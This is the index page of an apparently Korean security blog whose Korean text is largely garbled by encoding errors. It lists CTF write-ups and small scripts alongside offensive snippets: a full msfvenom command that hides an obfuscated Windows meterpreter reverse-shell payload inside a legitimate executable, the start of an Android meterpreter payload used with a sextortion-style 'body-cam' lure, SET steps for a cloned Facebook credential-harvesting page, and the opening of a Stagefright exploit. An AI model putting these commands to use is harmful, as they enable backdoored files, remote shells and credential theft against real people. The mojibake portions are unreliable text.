728x90 ๋ฐ์ํ Lucete284 python ๊ฐ์ ํ์ผ ๋ฝ์๋ด๊ธฐ :) ์ฌ์ ํ์ผ์ ํ์ผ์ด๋ฆ๊ณผ ํด๋๋ฅผ ์ง์ ํด์ฃผ๋ฉด ์ค๋ณตํ์ผ์ ๋ฝ์์ค๋๋ค :) # -*- coding: utf-8 -*- import os f = open('/Users/z3alous/Desktop/flag1.txt', 'w') Language 2016. 12. 18. md5 ํ๋ฒ์ ์ธ์ฝ๋ฉํ๊ธฐ :) ex)ํด๋์ง์ # -*- coding: utf-8 -*-import hashlibimport os f = open('/Users/z3alous/Desktop/flag.txt', 'w') def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() for root, dirs, files in os.walk('ํด๋ ๊ฒฝ๋ก'): for fname in files: full_fname = os.path.join(root, fname) f.write(md5(full_fname) + '\n') f.. Language 2016. 12. 18. nmap tutorial :) nmap์ network mapper์ ์ค์ธ๋ง๋ก ๋คํธ์ํฌ๋ฅผ ๊ฒ์ํ ๋ ๋งค์ฐ ์ข์ ํด์ด์ง๋ง ํด์ปค์๊ฒ ๊ฐํ ๋ฌด๊ธฐ๊ฐ ๋ ์ ์๋ ์คํ ์์ค ์ด๋ค. nmap์ ๊ณต์ ์ฌ์ดํธ๋ www.nmap.org ์ด๋ฉฐ ์ฐ๋ถํฌ ๊ฐ์ ๊ฒฝ์ฐ์ apt-get install nmap Security Study/Network 2016. 12. 17. V3SPA: An Open Source Tool for Visually Analyzing and Diffing SELinux/SE for Android Security Policies V3SPA: An Open Source Tool for Visually Analyzing and Diffing SELinux/SE for Android Security Policies SELinux and SE for Android can be a crucial part of securing a system, but the size and complexity of SELinux security policies make them challenging for security policy administrators to develop and maintain security policies. For example, the sesearch utility shows 94,420 allow rules in the 2.. Security Study/Server(Linux) 2016. 12. 17. youtube ๊ตฌ๋ ๋ถํ๋๋ ค์ :) subscribe plz :) ๋ณด์ ๊ด๋ จ ๋์์์ ์ฌ๋ฆด ์์ ์ ๋๋ค. :)๋ง์ ๊ตฌ๋ ๋ถํ๋๋ ค์ !! https://www.youtube.com/channel/UCn81GCH7RfiOdaZmWfng2Ng We will post security related videos. :)Many subscriptions please !! My Story 2016. 12. 16. RC3CTF_300_Breaking News 300 - Breaking NewsWe just received this transmission from our news correspondents. We need to find out what they are telling us.file ๋ฌธ์ ์ธ๋ฐ ๋ฌธ์ ์ ํ์ผ์ ๋ฐ์๋ณด๋ฉด ์์ง์ผ๋ก ํ์ผ์ ํ๋ ์ฃผ๊ณ ๊ทธ๊ฒ์ ํ๋ฉด ์ด์ ์ฐ๋ฆฌ๊ฐ ํ์ด์ผ ํ๋ ๋ฌธ์ ํ์ผ๋ค์ด ๋์จ๋ค. ๋จผ์ ํฅ์ค๋ก ํ์ผ์ ํ์ธ ํด๋ณด๋ฉด ๋ณ ํน์ดํ ๊ฒ์ด ์๋ ๊ฒ๊ฐ๋ค ํ๋ ํ๋ ๋ณด๋ ๋์ค ๋ง์ง๋ง์ base64๋ก ๋์ฝ๋ฉ์ด ๋์ด ์๋ ๊ฒ ๊ฐ์ ๋ฌธ์์ด์ ๋ฐ๊ฒฌํ๊ณ ํ๋ํ๋ ํ์ผ์์ ๊ทธ๋ฌํ ๊ธ์๋ง ๋ชจ์๋ณด์๋ค. ์ด ๋์จ ํ์ผ์ 5๊ฐ chapter 4, 9, 10, 15, 18 ์ด๋ ๊ฒ ๋์๋ค. ์ด์ base 64 decoding ์ ํด๋ณด์ base 64 ๋์ฝ๋ฉ์ ํ๋.. Wargame/CTF(Capture The Flag) 2016. 12. 16. Mobile Application Reverse Engineering: MARA Mobile Application Reverse engineering and Analysis Framework MARA is a Mobile Application Reverse engineering and Analysis Framework. It is a tool that puts together commonly used mobile application reverse engineering tools, in order to make the task or reverse engineering and analysis easier and friendly to mobile application developers and security professionals. Features supportedAPK Revers.. Security Study/Reversing 2016. 12. 16. netool ์ค์น๋ฐฉ๋ฒ(how to install netool) netool = script project ๋ทํด์ ์ค์นํ๊ธฐ ์ํด https://sourceforge.net/projects/netoolsh/ ๋ค์ด๊ฐ๋ฉด ๋ฐ์์ ๊ฐ์ ์ฐฝ์ด ๋ฌ๋ค. :) Git -> opensource-kali ๋ฅผ ํด๋ฆญํ๊ฒ ๋๋ฉด ๋ฐ์ผ๋ก ์ญ์ญ ๋ด๋ฆฌ๋ฉด ์ค์น๋ฐฉ๋ฒ์ด ๋ฌ๋น :) ์์ธํ๊ฑด ์ ํ๋ธ๋ก Metasploit/Kali & Backtrack 2016. 12. 16. ์์ฆ ์ ํ ํ๋ ๋ชธ์บ (๊ธฐ์ด๋ฐฉ์) ์์ฆ ๋ชธ์บ ์ด ์ ํ์ ํ์๋ค. ๋์ถฉ ์๋ฆฌ๋ฅผ ๋ณด๋ฉด ์ค์นดxx๊ฐ์ ๊ณณ์์ ์ฑํ ์ ํ๋ค๊ฐ ๋ชธ์บ ์ ํ์๊ณ ํ์ผ์ ๋ฐ์ผ๋ผ๊ณ ํ๋ค. (๋ชธ์บ ์ ํ๊ธฐ์ํ ์ ์ฉ ํ์ผ์ด๋ผ ๋ปฅ์ ์น๋ค.) ๊ทธ๋ฌ๊ณ ํ์ผ์ ๋ณด๋ด๋๋ฐ ๊ทธ ํ์ผ์ ๋น์ฐํ ์ ์ฑ์ฝ๋ !! :) ์ด์ ๊ทธ๊ฒ์ ์ฌ์ฐํด๋ณด์ ๊ทธ์ ์ ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.์์ํด๋ณด์ :X ๋จผ์ service apache2 start๋ก ์ํ์น๋ฅผ ์คํ ์์ผ์ฃผ๊ณ service postgresql start ๋ก postgresql ๋ํ ์ํจ๋ค. ๊ถ๊ทน์ ์ธ ๋ช ๋ น์ด service metasploit start ๋ก metasploit ๋ํ ์คํ์ํจ๋ค. ๊ทธ ํ ์ด์ ์ ์ฑ์ฝ๋๋ฅผ ๋ง๋ค์ด์ผ ํ๋๋ฐ...๋ช ๋ น์ด msfvenom์ ์ด์ฉ ํ์ฌ ๋ง๋ค์ด ๋ณด์.msfvenom -p android/meterpreter/.. Metasploit 2016. 12. 15. Pharming malware ์์ฐ์ ๋๋ค. Pharming malware ํ๋ฐ ์ ์ฑ์ฝ๋ ๋์์์ ๋๋ค. ์ฃผ์ํ์ธ์ค :) Malware 2016. 12. 15. SQL injections vulnerabilities in Stack Overflow PHP questions SQL injections vulnerabilities in Stack Overflow PHP questions lastest SQL Injection vulnerabilities in PHP questions sql injection ์ทจ์ฝ์ ์ ์ทจ์ฝํ php๋ฌธ์ ๋ณผ์ ์๊ณ ๋ณด๊ธฐ ์ฌ์ด ์ธํฐํ์ด์ค๋ก ๋์ด์์ด์ :) https://laurent22.github.io/so-injections/ Security Study/Web 2016. 12. 14. python ์ ์ฑ์ฝ๋ ์ํ์ ๋๋ค. python ์ ์ฑ์ฝ๋ ์ํ์ ๋๋ค. ๋ถ์ ๋๋ ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. import subprocessimport sysimport osimport base64import binasciiimport threadingimport timeimport randomimport stringimport imaplibimport emailimport uuidimport platformimport ctypesimport json#import logging #from traceback import print_exc, format_excfrom base64 import b64decodefrom smtplib import SMTPfrom email.MIMEMultipart .. Malware 2016. 12. 14. seccon2016 - Memory Analysis_100 Memory Analysis100 pointsMemory Analysis Find the website that the fake svchost is accessing. You can get the flag if you access the website!!memoryanalysis.zip The challenge files are huge, please download it first. Hint1: http://www.volatilityfoundation.org/ Hint2: Check the hosts filepassword: fjliejflsjiejlsiejee33cnc ์ด๊ฒ์ด ๋ฌธ์ ์ธ๋ฐ ... ํ์ผ์ ๋ฐ์ผ๋ฉด ์ด๋ฏธ์ง ํ์ผ ํ๋๋ฅผ ๋ฐ์ ์ ์๋ค.ํํธ 1๋ฒ์ ๋ณด๋ฉด ๋ณผ๋ผํธ๋ฆฌํฐ๋ฅผ ์ด์ฉํ์ฌ ํธ๋ ๊ฒ๊ฐ๋ค. ๋จผ์ ์ด.. Wargame/CTF(Capture The Flag) 2016. 12. 13. rsa.py_ctf #๊ฐ๋ฃ์ผ๋ฉด ''์์ ๊ธฐ...p = ''g =''a = ''b = '' C = ''CA = pow(C,a,p)CAB = pow(CA,b,p) print("key_is",CAB) Language 2016. 12. 12. seccon2016 - voip_100 VoIP100 pointsVoIP Extract a voice. The flag format is SECCON{[A-Z0-9]}. ๋ฌธ์ ๋ฐ์ค๋ค... ํ์ผ์ ๋ฐ์ผ๋ฉด pcapํ์ผ์ ๋ฐ์ ์ ์๋ค. ํ์ผ์ ์ด์ด๋ณด๋ฉด ์์ด์ด ์คํฌ๋ก ์ด๋ฆฌ๋๋ฐ... RTP์ ๋์ฝ๋ ํ ๊ฒ์ด๋ค.๊ทธ๋ผ RTP๋ ๋ญ๊น?RTP๋ ์ค์๊ฐ ๋ฉํฐ๋ฏธ๋์ด ๋ฐ์ดํฐ์ ์ ์ก์ ์ง์ํ๋ Real Time Protocol๋ค. Analyze๋ผ๋ ๋ฉ๋ด์ ๋ค์ด๊ฐ๋ฉด Decode As๋ ๋ฉ๋ด๋ฅผ ์ฐพ์ผ ์์๋ค. ๋ฉ๋ด๋ฅผ ํด๋ฆญํ๋ฉด ์์ ๊ฐ์ ์ฐฝ์ด ๋จ๋๋ฐ +๋ผ๋ ํ์๋ฅผ ๋๋ฌ RTP๋ฅผ ๋ฑ๋ก ํด์ฃผ๋ฉด ๋๋ค. ๊ทธ ํ Telephony๋ฉ๋ด์์ RTP์์ Stream Analysis๋ฅผ ํด๋ฆญํ๊ฒ ๋๋ฉด ์ด๋ ๊ฒ streaming ๋๋ ๊ฒ์ ๋ณผ์์๋ค. ์ ๊ธฐ์ ํ๋ ์ด streams๋ฅผ ํด๋ฆญํ๋ฉด ์.. Wargame/CTF(Capture The Flag) 2016. 12. 12. SECCON2016 - Vigenere_100 SECCON 2016 Vigenerek: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe ๋ฌธ์ ์ด๋ค. Vigenere ์ํธ๋ฅผ ์ด์ฉํ์ฌ ํ์ด์ผ ํ ๊ฑฐ ๊ฐ๋ค. SECCON{ = VIGENER E p: SECCON{ }c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ |A B C D E F G H I J K L M N O P Q R S T U V W X Y Z { }--------------------------------.. Wargame/CTF(Capture The Flag) 2016. 12. 12. roo-me)Command & Control - level 2 -15Poin ํ์ผ์ ๋ค์ด ๋ฐ๊ฒ ๋๋ฉด ๋์ ch2.dmp๋ผ๋ ๋คํํ์ผ์ ์ป์ ์ ์๋ค.!!! ๋ฌธ์ ๋ฅผ ํด์ํด๋ณด์! ์ ๋ต์ ์ํฌ์คํ ์ด์ ํธ์คํธ๋ค์(์ฆ, ์ปดํจํฐ์ด๋ฆ)์ด ์ ๋ต์ด๋๋ค.! :) ๋ฃฐ๋ฃจ~ ๊ทธ๋ผ ํด๋ณด์ ํ์๋ strings ๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ํ์ด๋ณผ ๊ฒ์ด๋ค. strings ch2.dmp | grep COMPUTERNAME Wargame/CTF(Capture The Flag) 2016. 12. 12. Hack The Vote forensic 150 - Warpspeed ๋ฌธ์ ๋ฅผ ๋ค์ด๋ฐ์ ๋ณด๋ฉด ์ด๋ฌํ ์ฌ์ง์ ๋ฐ์ ์ ์๋ค. ๊ธ์จ๊ฐ ์ฐ๊ทธ๋ฌ์ ธ์ ๋ณด๊ธฐ ํ๋ค๋ค... ์ด๋ป๊ฒ ํ๊น ์๊ฐ์ ํ๋ฉด์ ๋ ธ๊ฐ๋ค๋ก ํ๋ํ๋ ์๋ผ์ ํ์ด๋ณผ๊น ์๊ฐ์ ํด๋ดค์ง๋ง 010editor ๋ผ๋ ํ๋ก๊ทธ๋จ์ ์ด์ฉํ์ฌ ํ์ด๋ณด๊ธฐ๋ก ํ๋ค. ์ด๋ ๊ฒ ํ์ผ์ ๋ณผ์๊ฐ ์๋ค. JPG.bt๋ฅผ ํ์ธํ์ฌ WORD Y, WORD X์ ๊ฐ์ 500, 500 ์ผ๋ก ๋ณ๊ฒฝํ ๊ฒ์ด๋ค. ๋ณ๊ฒฝํ์ฌ ์ ์ฅ์ ํ๊ฒ ๋๋ฉด ์ด๋ ๊ฒ ๊ธ์๋ฅผ ํ์ธ ํ ์ ์๋ค.!!! ๋์!!! Wargame/CTF(Capture The Flag) 2016. 11. 24. string filter(php) php://filter/string.rot13/resource=example.com http://php.net/manual/en/filters.string.php Security Study/Web 2016. 10. 5. CodeGate 2013 f300 Code Gate 2013 ๋ฌธ์ ๋ฅผ ๋จผ์ ๋ณด๋ฉด ํ์ผ์ ๋ค์ด ๋ฐ์๋ณด๋ฉด docxํ์ผ ํ๋๋ค ... ์๊ฐํด๋ณด์ ?..... ์ด๋ฌํ ๋ฌธ์ ๋ ooXML(office open XML)๋ฌธ์ ์ผ ๊ฐ๋ฅ์ฑ์ด ํฌ๋ค. ์คํผ์ค ์คํ XML(Office Open XML, OOXML, ์คํXML)์ ๋ง์ดํฌ๋ก์ํํธ๊ฐ ์ถ์งํ์์ผ๋ฉฐ 2006๋ ๊ณผ 2008๋ ๋์ฐจ๋ก์ ๊ฑธ์ณ Ecma ์ธํฐ๋ด์ ๋์ ์ ๋ฝ ํ์ค(ECMA-376)์ผ๋ก, 2008๋ ์ ISO/IEC์ ๊ตญ์ ํ์ค(ISO/IEC 29500)์ผ๋ก ์น์ธ๋์๋ค. ์ด ๋ฌธ์ ๊ท๊ฒฉ์ ๋ฌธ์, ํ๋ ์ ํ ์ด์ , ์คํ๋ ๋์ํธ๋ฅผ ํฌํจํ๋ค. ํ์ฅ์๋ .docx ๋๋ .docx(๋ฌธ์), .pptx(ํ๋ ์ ํ ์ด์ ), .xlsx(์คํ๋ ๋์ํธ)๋ก ํต์ผ๋์ด ์๋ค. -wiki- ๋จผ์ docxํ์ผ์ zip์ผ๋ก ํ์ฅ์ ๋ณ๊ฒฝ ํ ํ.. Wargame/CTF(Capture The Flag) 2016. 9. 23. ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) ๋ชจ๋ ์ฌ์ฉ์ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. msfvenom -a ์ํคํ ์ณ --platform ํ๋ซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํธ๋ค๋ฌ์์ ํ๋ก์ธ์ค ์ฎ๊ธฐ๋ ๋ช ๋ น์ด migrate ํ๋ก์ธ์ค ๋๋ฒ ex) migrate 1111 Metasploit 2016. 5. 24. apmsetup์์ forbidden๋ฌธ์ ํด๊ฒฐ apmํด๋๋ฅผ ๋ค์ด๊ฐ์ (ex)C:\APM_Setup\Server\Apache\conf) < -์ด๋ ๊ฒ ๋ค์ด๊ฐ์ httpd.confํ์ผ์ ๋ฉ๋ชจ์ฅ์ผ๋ก ์ด์ด ์๋์๊ฐ์ด ์์ ํด์ค๋ค. # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both compl.. Security Study/Server(Linux) 2016. 3. 2. ๊ฐ์ง facebook๋ง๋ค๊ธฐ ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ธ์. ๋จผ์ Kali linux or parrot linux์์ ํฐ๋ฏธ๋์ open setoolkit์ ์ ๋ ฅํ๋ค. ์ ๋ ฅ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ ํ์ธ ํ์ค์ ์์ต๋๋ค. ์ฌ๊ธฐ์ Social-Engineering Attacks๋ฅผ ํด์ผํ๊ธฐ ์ํด 1๋ฒ์ ์ ๋ ฅํฉ๋๋ค. ๋ค์์ Website Attack Vectors์ ์ํด 2๋ฒ ์ฌ๊ธฐ์์ Credential Harvester Attack Method๋ฅผ ์ํด 3๋ฒ facebook์ ๋ง๋ค๊ธฐ ์ํด 2๋ฒ์ ํด๋ฆญํฉ๋๋ค. ์ฌ๊ธฐ๊น์ง ํ์ จ์ผ๋ฉด ๋ฐ์์ต๋๋ค. 2๋ฒ์ ํ์ จ์ผ๋ฉด IP๋ฅผ ์ ๋ ฅํ์๋ฉด ๋๋๋ฐ์! ip๋ฅผ ์ ๋ ฅํ๋ฉด ์ด์ cloneํ๊ธฐ ์ํ ์ฌ์ดํธ๋ฅผ ์ ๋ ฅํ์๋ฉด ๋ฉ๋๋ค. ์ ๋ facebook.com์ ํ๊ธฐ์ํด http://faceboo.. Metasploit 2016. 2. 11. ๋ค์ ๋ธ๋ก๊ทธ ํ์ฑํํฉ๋๋ค. ๋๋ต 2๊ฐ์๋์ ๋ธ๋ก๊ทธ๋ฅผ ์ ๊ฒฝ์ฐ์ง ๋ชปํ ๊ฒ ๊ฐ์ต๋๋ค. ๋ค์ ๋ธ๋ก๊ทธ๋ฅผ ํ์ฑํํฉ๋๋ค. ๋ค๋ค ์ํด๋ณต ๋ง์ด ๋ฐ์ผ์๊ณ ์ํ์๋ ๋ฐ ๋ชจ๋ ์ด๋ฃจ์ด ์ง๊ธธ ๋ฐ๋๋๋ค. My Story 2016. 2. 10. stagefright.py ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10. ์ด์ 1 ยทยทยท 3 4 5 6 7 8 9 ยทยทยท 12 ๋ค์ 728x90 ๋ฐ์ํ